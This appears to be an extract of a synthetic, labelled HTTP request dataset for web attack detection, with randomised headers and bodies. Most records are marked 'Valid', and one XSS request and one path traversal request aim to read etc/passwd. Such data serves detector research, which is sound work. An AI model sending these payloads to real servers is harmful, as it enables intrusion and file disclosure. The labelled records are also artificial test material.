Accept-Charset: x-mac-arabic, koi8-r, cp-950;q=0.1, x-mac-roman;q=0.3
Accept-Encoding: *
Accept-Language: riin-atet, t-kYnr;q=0.6
Cache-Control: no-cache
Client-ip: 95.5.104.71
Cookie: IFR4netcatOj=794;sl0=tstuifh5h6;bE5shrnT2ao=of7niass8yotyetesI
Cookie2: $Version="9"
Date: Tue, 30 Nov 04 10:54:37 GMT
ETag: "foHX3bXLfs1bsOyu"
Expect: 100-continue
From: lnaihJy@tevauie.cz
If-Modified-Since: Thu, 02 Mar 06 02:43:36 GMT
If-Unmodified-Since: Thu, 24 Mar 05 12:14:21 GMT
If-Match: *
If-None-Match: "CYkTT@OILgOBRXZ5c"
If-Range: "V1H4QPRHKPlEchvApRE"
Max-Forwards: 418
MIME-Version: 9.8
Pragma: ee=g
Proxy-Authorization: opvtak edesT=1eHenu
Authorization: Digest qop=auth
Range: 4-136390,-06191
Referer: /iE5iros.tiff
TE: deflate;q=0.9,chunked;q=0.0
Trailer: Accept-Language
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 0.2; 2i-ge; rv:0.4.0) Gecko/29123644
UA-CPU: PowerPC
UA-Disp: 9829,461,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 273x3585
Via: 5.4 www.izo5h.html
Transfer-Encoding: compress
Upgrade: aieRqe/7.7, c9oee/9.2, Halyoi/5.2, nsb/5.8
Warning: 809 106.201.176.121 "t6rgoAtastVnesEit" 
X-Forwarded-For: 131.126.252.251
X-Serial-Number: 606819653
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16000
Start - Id: 10179
class: Valid
GET /uaa7geesr1tl/fqrLFmZd/ueweutsnCnte33een/iyntianuRasgiaipo/ocepyu/mALVbeugbQKxqz.z.mspx?mailcLrk7v_m=hetrFiadhupng0D&tHr6=child%3D&7vrng=-a%3Fe&1dsvUsnn=window.open%25eb5&vwtgecme=rnullbtin%40%5D&4eneoe=divaccess_log-naaRenetcatit%2Fwt&.P09hLw=96683&5FExvarK9yL@=open%40aexecOdtl1%5Boicmd8oso+ HTTP/1.0
Host: www.iupthepaja.net
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 94.103.168.53
Cookie: ONt=69219;ole=l ThyPc6n8elasba<'4
Cookie2: $Version="50"
Date: Thu, 07 Dec 06 18:22:49 CET
ETag: "m9YNT.vHThE98mn8"
Expect: 100-continue
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Mon, 10 Sep 07 03:02:51 GMT
If-Unmodified-Since: Sat, 16 Feb 08 15:51:03 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Jun 04 08:22:06 CET
Max-Forwards: 18
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM b3A2c2l5MXZyYWRldGFpNXJlOTVpWWFpbWU1NU5zRW9ldVJhZmFzdHh0MWY5YWk=
Range: 0942-16,4-99538,69635-
Referer: http://www.rgurblTp.st/diad/eLas8ey/ffunttu/so3t.jpeg
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/8.4 (compatible; MSIE 3.8; Linux i386; 0SnteL; rehDlewece; qtfsr)
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: vntee/6.2 91.70.115.180:88
Transfer-Encoding: gzip
Upgrade: imhr/0.1, n6leen/2.1, iPhT/4.2
Warning: 842 www.ktzeHh.shtml "eDtsrAi" 
X-Forwarded-For: 104.138.147.78
X-Serial-Number: 806441613781803
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10179
Start - Id: 4780
class: Valid
PUT /w2OhtxhnfEcylasnbse/zrEd9xsw5iyznreAg/hi5ng/dtn0sh/hdcdsairbc/o-7dde6hR5AhYuZxN/mffNXa5pji/tn8eluthtyae2I.exe? HTTP/1.0
Content-Length: 198
Content-Language: tp9jhn
Content-Encoding: deflate
Content-Location: http://moaesq.de/es9mzizR/57bsi3r3.php
Content-MD5: ZWhld2lnbmJwbWFzd2hyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Jan 06 01:25:25 CET
Last-Modified: Mon, 10 Jan 05 01:18:23 UTC
Host: 16.143.1.236
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-2022-jp, windows-1257, windows-874;q=0.1, x-mac-hebrew;q=0.2, windows-1253
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 187.93.237.97
Cookie: bewzyabnitewnLf=848791
Cookie2: $Version="9"
Date: Wed, 07 Sep 05 11:47:00 UTC
ETag: "qBJcdA11IyNlUnRQUtm"
Expect: 100-continue
From: 4adah@os1EUenswi.uk
If-Modified-Since: Thu, 11 Mar 04 12:02:19 UTC
If-Unmodified-Since: Fri, 13 Oct 06 24:46:50 UTC
If-Match: *
If-None-Match: "XjejdQqNjI9Ai3m"
If-Range: Sun, 15 Nov 09 13:21:18 GMT
Max-Forwards: 96
MIME-Version: 0.4
Pragma: h0dgronx=gaonnio
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: vwe1d r2enpe=ept8tsN
Range: 1757-72,-28304,0-
Referer: /yszt/sota5/gtsnpl8.pdf
TE: gzip;q=0.8,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.7 (Windows; U; Win98 3.9; 4s-9u; rv:1.6.3) Gecko/66605611
UA-CPU: x86
UA-Disp: 109,747,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 425x376
Via: 6.6 34.22.86.232, 3.9 202.60.23.57:03, HTTP/3.1 140.132.151.24
Transfer-Encoding: deflate
Upgrade: zedlh/8.1, naR/6.0, eeufs/3.6, reei/8.9, fshaut/4.2
Warning: 541 246.190.52.10 "Lgejbyurversetq" "Sat, 20 Jun 09 14:22:24 UTC"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tti=h&nseffrhpclef5r=8965&R_zf3YrD=3bodycmdbetweens<tC1one'&sphu=770361&eEmEYi0tstx=boot.iniei9ptd n93che&otttmcro=1st8b6Of&A6DRcZ6Uw=asItncaifEaaaar&nwnt8e=T&S97lk=rrpnode&et2soeTeedl=Jntis|h

End - Id: 4780
Start - Id: 15560
class: Valid
GET /tBATKl1@e1W_/o-5jQ8X/ru4e1oNtas5irsr/dmy.C4GU-KlTuG43/slNQ67yM@eK/EumhtaaeS/h8LQuaU/4jcs3hu3ttxuU/ap7bsnfbBnnc/gsuinza5Wognlfn9sn/73mchildfVHmWx/q3.cfm?WkAXh=su&omne=5978076&2gB67vheSchild=aXed&ed=ooUmXIT.0 HTTP/1.0
Host: www.xlimfirod.cz
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-cyrillic;q=0.2, iso-8859-1, x-mac-greek;q=0.7
Accept-Encoding: gzip;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 227.212.204.1
Cookie: fgri9s=liotekrtSrRw;osj=ehfAex+Eostiiu4;turafflslcxh=16536;outSasy=1
Cookie2: $Version="69"
Date: Fri, 29 Oct 04 17:19:03 UTC
ETag: "jyj98E7VnAiFYCcm"
Expect: rtaa=ovao
From: Ftobr@eibao.net
If-Modified-Since: Sun, 02 Apr 06 02:09:35 CET
If-Unmodified-Since: Wed, 14 Apr 10 08:16:23 CET
If-Match: *
If-None-Match: *
If-Range: "4T0y-vFs_sJetNN7M"
Max-Forwards: 57
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Hsumxd sali8=ohirmDyt
Authorization: Digest realm
Range: 1-622060
Referer: /AWEht/exlhsmm.dll
TE: deflate,trailers,trailers
Trailer: Cache-Control
User-Agent: ausn0cthe (inbBgC)
UA-CPU: x86
UA-Disp: 213,6888,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5730x198
Via: 8.1 107.214.41.228
Transfer-Encoding: identity
Upgrade: aeaae/1.2, oeh0/9.9, asctrd/8.3
Warning: 169 27.250.209.229 "tee9rk" 
X-Forwarded-For: 234.88.187.100
X-Serial-Number: 4557726217620382027
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15560
Start - Id: 5291
class: Valid
POST /K@E1and/edGUj-t5sAtft3tDpm/sm-/kISVLp/SHOSMcpIdK.gif? HTTP/1.0
Content-Length: 173
Content-Language: 5,7earmI
Content-Encoding: compress
Content-Location: /tgoe7na/aehnm/wogtiHc/hEJe.mspx
Content-MD5: bjJpYWVzbkhzbjJpbHRjZw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Dec 06 17:59:42 CET
Last-Modified: Tue, 09 Nov 04 19:06:00 GMT
Host: 77.24.96.12
Connection: close
Accept: application/rtf;q=0.9, application/*
Accept-Charset: windows-1255, cp-932;q=0.7, windows-1254, euc-kr, macintosh;q=0.5
Accept-Encoding: deflate, deflate;q=0.7, gzip
Accept-Language: s-ea2w;q=0.9, Mc1e7in-weenof5, ds1tue-8ieef, x-s
Cache-Control: enuei9rm='aDt6ew'
Client-ip: 116.171.50.94
Cookie: Lunittgbont=23
Cookie2: $Version="88"
Date: Mon, 16 Aug 04 09:02:16 CET
ETag: "hVxHsrYAQqM_e7KE28G"
Expect: enfl
From: rpfz@tmadFbssh.cz
If-Modified-Since: Mon, 26 Apr 10 16:58:24 GMT
If-Unmodified-Since: Thu, 07 Jun 07 06:50:54 UTC
If-Match: "0EBsQ2n4aaNSkKf0F"
If-None-Match: "UED59iC7qp8naejd-uZq"
If-Range: *
Max-Forwards: 934
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: fbsyd htuo=tbv9k
Authorization: NTLM b25FbHNqbnJobGxzVGh0emdjc2tTYmVsbGhzbmpzaWhvaXNkazgwZTY=
Range: 44-,39-,850121-
Referer: http://etlwno.de/ra1i/mnrhur/ntNe5h.mdb
TE: chunked
Trailer: Range
User-Agent: iOy9Sxs http://www.tewha.de
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1146x7241
Via: 0.2 206.37.207.157:778
Transfer-Encoding: 2aesr; cotEao=ht9t
Upgrade: ehpx5/0.0, arxncn/6.5, nwer/0.3, shn/9.2, otna/5.5
Warning: 155 41.32.226.111 "u6eteeEntposrsoPm" "Sat, 31 Jul 04 05:15:59 CET"
X-Forwarded-For: 86.174.5.96
X-Serial-Number: 722934427408966635
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

oebekshh=aiwnannubseoe&hniigeaata=0806&Ezntrehlele=98&nbd=rdSsjLhnOHLesoh&_winnt8JnOC=172392&8ptnetcate2nnx8.=8877&sIa9=31225&4rottio7hno=aorhE1sad7ta&nevEOlshleerga=0112676

End - Id: 5291
Start - Id: 6615
class: Valid
POST /px8m8BPq.9s/r0t4el9oua/eTGHIrOGWrxGMi/ePwX-/i_t5jxTs24PoGkbGld/oTzU2./a488kVp6WeEuJSj/wrbxd/pvfvyZp8jXtTcxyk/iitmeegn/pCS2Le-OPcTySYx.html? HTTP/1.0
Content-Length: 316
Content-Language: aw17,aurtLant
Content-Encoding: identity
Content-Location: http://t3aahho.gov/stwtnfl/r8eee8.jsp
Content-MD5: cnJkbjZhTmpyZW1wbnFyNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 Nov 08 21:00:57 GMT
Last-Modified: Tue, 19 Feb 08 07:34:35 UTC
Host: www.iceft8ue.ch
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: ePg=0lpu
Client-ip: 192.147.185.236
Cookie: irwOi0sie=xJkjWs;iEbn=and ODOcr7anteth;crU0iGyr=yxe9RqkJNxXh;Hfao9Rys2=n'r ;me0orE0ettro=w;nAsrt5iu=inetcatOeRauJ2Y
Cookie2: $Version="695"
Date: Sat, 13 Mar 10 19:39:09 GMT
ETag: W/"@EPAcRqyQ7lDSvSX"
Expect: 100-continue
From: yl1dq7lA@wYd2.cz
If-Modified-Since: Wed, 25 Nov 09 20:29:20 UTC
If-Unmodified-Since: Sat, 18 Sep 04 24:53:13 GMT
If-Match: *
If-None-Match: "w7JOdWSR7nhmMNIOx"
If-Range: Fri, 27 Apr 07 23:14:55 CET
Max-Forwards: 6270
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: zmtsI sarl0ue=aryfers
Authorization: Basic MXRucnk6OWlhY3JJU20=
Range: 349575-,-01819
Referer: http://hemrteas.de/orbadT/ijrloel/FAnswfic/whigm/w3sxal.mdb
TE: deflate;q=0.2
Trailer: Warning
User-Agent: ne3wse (r6e7@ENLnB; nEQvcf)
UA-CPU: PowerPC
UA-Disp: 3961,730,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2928x871
Via: HTTP/7.4 7.16.128.60
Transfer-Encoding: identity
Upgrade: fmu/0.4, eel/9.8, ebSrda/0.8, OsurI/5.9, recrv/2.4
Warning: 107 4.57.179.221 "8neA" 
X-Forwarded-For: 101.21.26.57
X-Serial-Number: 43970651738336527001
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hliii=991991&saiEponouWh=0637&txosti6so=arm&eeauncsleze= sni:ora&d3hlirrp7aouo9=11932&okoismtbjhh7e=8013365&aItsftefmAe6f=2ls/t:;ts5~lqN&oriazhGpoeRs=4jjxnU.F7&zthgo3d0=e\h nnldnut4Rr[mC|&Zgppositionglk=hecrsEmeamCamotb&RaL6lttmdao=rko1qxgP&fdlx1ob=178&b3mttzordaeaa=74&6egn5i0ra= &ot1sEdgrebS=@ruo

End - Id: 6615
Start - Id: 5563
class: Valid
POST /v9DpEkl.gif? HTTP/1.0
Content-Length: 41
Content-Language: Uotlhb
Content-Encoding: deflate
Content-Location: http://r5te.it/p2tejt/itSnme/5zdhrobl/neti4vm.wmn
Content-MD5: cmxuamU2bW5mdHJidGVpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Feb 06 11:45:14 GMT
Last-Modified: Fri, 11 Jan 08 13:07:25 CET
Host: www.eAoitvizrf.ch
Connection: close
Accept: image/gif;q=0.0
Accept-Charset: windows-1258
Accept-Encoding: *
Accept-Language: myh-daeu0;q=0.8, whs3srf-rr, rfntny-syplrgpE;q=0.3, Mtkebroo-iud, 8-aaocaasa
Cache-Control: no-transform
Client-ip: 181.131.207.235
Cookie: mtAtdcsm=dhr8a;CcrlootpIla=1228;Oietxoglopee7=6410
Cookie2: $Version="811"
Date: Tue, 27 Apr 04 22:36:32 UTC
ETag: W/"Ut2.5R.Vqv7zZTNbwg_"
Expect: enomert
From: ddE5mq0u@tano2i.be
If-Modified-Since: Wed, 08 Aug 07 03:08:33 UTC
If-Unmodified-Since: Mon, 21 Nov 05 08:36:30 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Apr 09 03:07:14 CET
Max-Forwards: 2771
MIME-Version: 1.1
Pragma: tDm2='ataunc4'
Proxy-Authorization: Digest realm
Authorization: Basic ZDRkbmwxOkVlaWw4
Range: -97243,-59
Referer: /at1pt/rdgRlzl/rhsean/7aoaGqLl/stb8Aaa.wmn
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 1.2; o2-ut; rv:8.7.4) Gecko/12999966
UA-CPU: x86
UA-Disp: 6011,239,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6340x801
Via: 3.2 211.160.221.82
Transfer-Encoding: identity
Upgrade: 4rlr/0.3, gsobha/3.9, R5tyi8/0.2
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 26.9.191.248
X-Serial-Number: 504491792
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

aVaaSaetromk=rbNjrymn&asrsey=e.2pwv5Vpl5f

End - Id: 5563
Start - Id: 13188
class: Valid
GET /i9Ttztunlgeswmlwuhr9.asmx?tenss=lEwh-&ow=e&oomiel4rlcpi=hoLhssvhmea&ewtetdoai0hf=r0ddrde4asoyaeOPc&tsa=723728&Srinellrt7u=hnsaQ&WxB4Lr=aet6utelnetrocivsSt&atf0=Q0hi6sxrnortan&ae=oCe2&n2=clG%273+libwhexec-or HTTP/1.1
Host: 77.210.200.208
Connection: 9uh5a
Accept: application/postscript;q=0.2, video/mpeg;q=0.0, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=72269
Client-ip: 169.235.34.90
Cookie: ioiewlgD7=34;oaosnehcin=dscr
Cookie2: $Version="70"
Date: Sun, 22 Feb 04 18:55:42 GMT
ETag: W/"CHJemz4YjAijP7F-"
Expect: aAnouo=shoba
From: rejnuaHz@hckar.biz
If-Modified-Since: Mon, 10 Dec 07 12:43:30 CET
If-Unmodified-Since: Thu, 16 Jul 09 07:37:03 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Aug 06 02:50:13 UTC
Max-Forwards: 6
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: ejnc4 maud=BEHiphf
Authorization: Digest username="juywe6"
Range: 645-,3478-02,76763-7861
Referer: http://nsogw7ay.be/e3ievm7.mdb
TE: deflate,trailers
Trailer: Date
User-Agent: rpenhorhrGi
UA-CPU: x86
UA-Disp: 185,098,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 992x6329
Via: 4.2 77.35.112.103, HTTP/1.6 www.iyLhlv.js, HTTP/2.0 184.61.46.247
Transfer-Encoding: AiTi
Upgrade: skn/0.2, ttri5f/7.5, Xl2hi/6.4, lre/8.6
Warning: 093 www.sqesrdhj.jpeg "auusyDnie" "Tue, 02 May 06 18:48:59 CET"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 82100256836
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13188
Start - Id: 16447
class: Valid
GET /na67X6VFJfG84/llheqb5/sS_-3G/uJGhV_j1a/fi@vLZd/iitaeno3ostDeraBtssp/v7/lBtZJBUIiZx1wcL@ND/Wwwsagrrsd1Ggsz/oq1ZMdxTeFaTbA0cA/tl.htm?hoFkiosolfcaho=efuia&ajr8yoriwuralfs=arcAC&tbtturtaheistt=rocldmsni3e&aaszengNf7iYt=371829&eddorureHen=5zevala&tsGlillahhpertn=weacopyUzryzprocessing-instruction++pk%5C1t&1etatra=bA3&eee=+ls%2Brt%5Cchild HTTP/1.1
Host: 62.14.178.38
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese;q=0.3, euc-cn;q=0.7, gb2312;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 36.98.169.205
Cookie: uAsS=aces;J.eMgh=202;rIuys75kso5=y2bxpyI;5ndd7bem3mR=xYazh
Cookie2: $Version="9"
Date: Wed, 16 Apr 08 13:14:46 UTC
ETag: W/"VhmJ3hFe1CQ3fFu"
Expect: 100-continue
From: ooipx3ae@mrhetnlIu.net
If-Modified-Since: Mon, 18 Sep 06 21:37:48 GMT
If-Unmodified-Since: Sun, 27 Jul 08 02:47:33 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Feb 04 22:26:17 GMT
Max-Forwards: 1
MIME-Version: 2.7
Pragma: suosedhs=5Tadrat
Proxy-Authorization: tdhuf n4f6rb=aohauny
Authorization: Digest response="d4EDaEF673D402ce9bedCdEA85e716a4"
Range: -4,1-
Referer: /d37a/4it8eoU/r3si/hEWr3i.rar
TE: chunked;q=0.0,trailers,gzip
Trailer: Date
User-Agent: xFel/1.7
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4066x2541
Via: jao/0.6 www.pglnt.png
Transfer-Encoding: deflate
Upgrade: hrts/1.5, ocenff/3.9, hafw/0.7, whsmet/4.1
Warning: 092 103.73.218.249 "iape" "Sun, 15 Apr 07 22:15:40 CET"
X-Forwarded-For: 242.120.138.182
X-Serial-Number: 3885571205
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16447
Start - Id: 3343
class: Valid
GET /Ffromi7H6Udropjd/nctfvf1brF9K/esylee4i3neoS/dc/link_xT6YWdS1rmbP/JnNMQQscriptqbgsoundkBOf/ar/ePw/sd/tnraoeeuewushRhi/_0.exe?eeomnea6araa=8818900&bLSremo4os=nsTa&fZos=ehhsaszi+&fas=heactsrelErd&prnd=hiPQXkoT6F&tcscnzttdo=ucpasswd&tyehpes2fdqraly=cpsh-O5p&ewechicttno=6&meaest9h4soilmh=edc9a%2Bfd HTTP/1.1
Host: 12.56.26.142
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2, x-mac-icelandic
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 136.57.231.123
Cookie: Zrailctrr6n8is=83832;yFaT=50970;nirRr3J=0029618
Cookie2: $Version="5"
Date: Sun, 01 Nov 09 11:20:24 GMT
ETag: W/"Ib6iWSthAB9fa1oIj"
Expect: qdysso=at15
From: rotrm@prr0Uaen9A.net
If-Modified-Since: Sat, 24 Apr 10 19:34:10 CET
If-Unmodified-Since: Sun, 24 Jun 07 08:54:00 UTC
If-Match: "gskR3175Eq0UxUvE"
If-None-Match: *
If-Range: Tue, 02 Sep 08 14:30:04 UTC
Max-Forwards: 231
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic ZXR5YWx1Om5pYThl
Authorization: Basic a0VzZTY6c2lnMHRodHQ=
Range: -757202
Referer: /jeUc/frEehoA/ihjErben/edsiwte/djeeu0e.php4
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/8.2 (compatible; oaM7; Linux i586; 2e7T; dAmaco6o)
UA-CPU: PowerPC
UA-Disp: 723,6349,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 701x9468
Via: auioyz/8.2 139.11.1.66, uims/0.5 179.0.172.62:1111
Transfer-Encoding: compress
Upgrade: eIegdt/9.4, stirq/7.7, npNs0/5.1, o8tb/3.3, lPry/7.4
Warning: 318 www.thxeOtH.gif "5umistbtjodse20isns" 
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 1661019854
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 3343
Start - Id: 46534
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: www.ttansig.fr
Connection: pM2rayHt
Accept: image/*, text/*;q=0.5, image/gif;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 252.144.87.30
Cookie: 7Cphp4V59x=7omeld;stthdtortfnhq=1770798
Cookie2: $Version="896"
Date: Fri, 25 Jul 08 13:25:07 CET
ETag: "aNVJT2lKpqFCO9DMA"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 27 Nov 05 11:09:58 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: "9oYjg2GYAoSOmeeT-f"
If-None-Match: "yv_QRaX62.mvfbK"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: nr1ti raeureu=fttsc
Range: 545941-
Referer: http://x2ie.st/reiTlp/dxbR32/ohnibr.bin
TE: trailers
Trailer: If-None-Match
User-Agent: bche (ttPYjFQD3; epH@8Zk6Wk; eqEl6yiFL; imQsPgU-2; aOLQykZoj)
UA-CPU: x86
UA-Disp: 9426,1336,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 139x000
Via: FTP/4.1 www.usAoaoei.jpeg, 6.2 8.43.235.100:254
Transfer-Encoding: deflate
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46534
Start - Id: 46341
class: PathTransversal
GET /ccnvei/t5_mX/ladI3D/Z47/alE0Bb3TP0G/vJ5JKF9Fv/4ghzYiedeelhi/nS8YR/iznaefe2ea/isZJS7Sgg_/iehqwti37eqnzd.jpg?Eu@T3-zinWfromz=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.0
Host: 180.97.95.250
Connection: rrym
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, compress, deflate, compress, compress;q=0.4
Accept-Language: Ee-schNo;q=0.2, ish-tdaIinri;q=0.9, bste-eh7fys;q=0.5, cRTr-cnzreugT, c-ie
Cache-Control: max-age=9
Client-ip: 67.69.34.52
Cookie: hbsn=37;tqVrncmmfiaw=a;etcO3kz=537845;6ojOh0=2ela;imgDfromfnXeua=isao
Cookie2: $Version="30"
Date: Fri, 10 Oct 08 18:00:55 UTC
ETag: W/"hkiby8KUNkxiNZXx6T8"
Expect: atpxEqu3
From: 5alenh@genhnf8.org
If-Modified-Since: Sat, 02 Feb 08 01:52:44 CET
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "1B.ht9QPm7xAQS1bDZD"
If-None-Match: *
If-Range: Tue, 07 Jul 09 14:59:57 CET
Max-Forwards: 0
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: d5wbMt sAfnisba=droetape
Authorization: Digest opaque="blytWmen"
Range: -282967,968090-1346,1029-352
Referer: /noy9/ewaei4.pl
TE: deflate
Trailer: If-None-Match
User-Agent: eeRce7sc (fJjp3p7o; aZD9.m)
UA-CPU: x86
UA-Disp: 0890,6289,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3713x610
Via: 5.0 www.aj70ien.gif, HTTP/6.8 140.239.252.219, HTTP/5.1 186.107.254.38:997
Transfer-Encoding: dsadwo; sisnkt9e=entd
Upgrade: zetne/3.4, eeirz/9.6, roaisl/4.6, ikirr/2.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 252.174.195.68
X-Serial-Number: 33688817267765601
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46341
Start - Id: 6134
class: Valid
POST /-Bservices9gidVS4A9zyinput/to/z13jWJtO.bin? HTTP/1.1
Content-Length: 284
Content-Language: 41go
Content-Encoding: compress
Content-Location: /onzrnr/Ufee/Ioione/Ttest/anrr6.gif
Content-MD5: Z2hlY25kcWVFc3VFdGE5cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Nov 08 07:31:34 CET
Last-Modified: Wed, 24 Oct 07 03:36:13 GMT
Host: www.Nueinjc.biz
Connection: keep-alive
Accept: image/*;q=0.6, video/*, application/zip;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: 59d9nN-la;q=0.2, D-mthcsmEu;q=0.5
Cache-Control: no-transform
Client-ip: 106.188.51.238
Cookie: peymeiei=mncshmEd(ee
Cookie2: $Version="901"
Date: Sun, 29 Mar 09 08:45:53 UTC
ETag: "jyQFaH4RlKaw88i"
Expect: meaF=Ewr0e;un9o=eexf1
From: Etnnkns@tnee.fr
If-Modified-Since: Fri, 28 Apr 06 16:53:46 UTC
If-Unmodified-Since: Wed, 18 Apr 07 05:21:08 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Feb 09 22:47:08 CET
Max-Forwards: 8936
MIME-Version: 4.3
Pragma: eobCeex=ox
Proxy-Authorization: Digest algorithm=cedo
Authorization: sasap heea=Vreahc3
Range: -29,06-
Referer: http://www.sw1m4cl.gov/Tdobsdel/hLdkj/nhAn/nOme.avi
TE: trailers,deflate,chunked;q=0.3
Trailer: Via
User-Agent: el4nwofa/6.8
UA-CPU: StrongARM
UA-Disp: 8680,157,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7265x3057
Via: 7.3 www.datt1r.jpeg
Transfer-Encoding: gzip
Upgrade: pnds/8.6
Warning: 335 www.isiR.js "eyuxr" 
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

umVr8aI0log=ah&isbedaLlstkja7=060&eunwt=987&mnnahyi4=tQxPDOmk&ayuynehIreto=gq9o7e4thnne&vSMMpsdelete=3543982&eli2eyebsthmch=5810&KMfpl.5_GXvd=9jaNw5ze+e<wp-slawinnt\Wr&tsoan=551&h.Kgg=05348163&epsSmemteN=7R1G&Otc1gtucreclee=eswue6&XAZXdf9ZU=fUerh&1UCdnLpaGD=eethpirpsoesndeletec

End - Id: 6134
Start - Id: 41748
class: SqlInjection
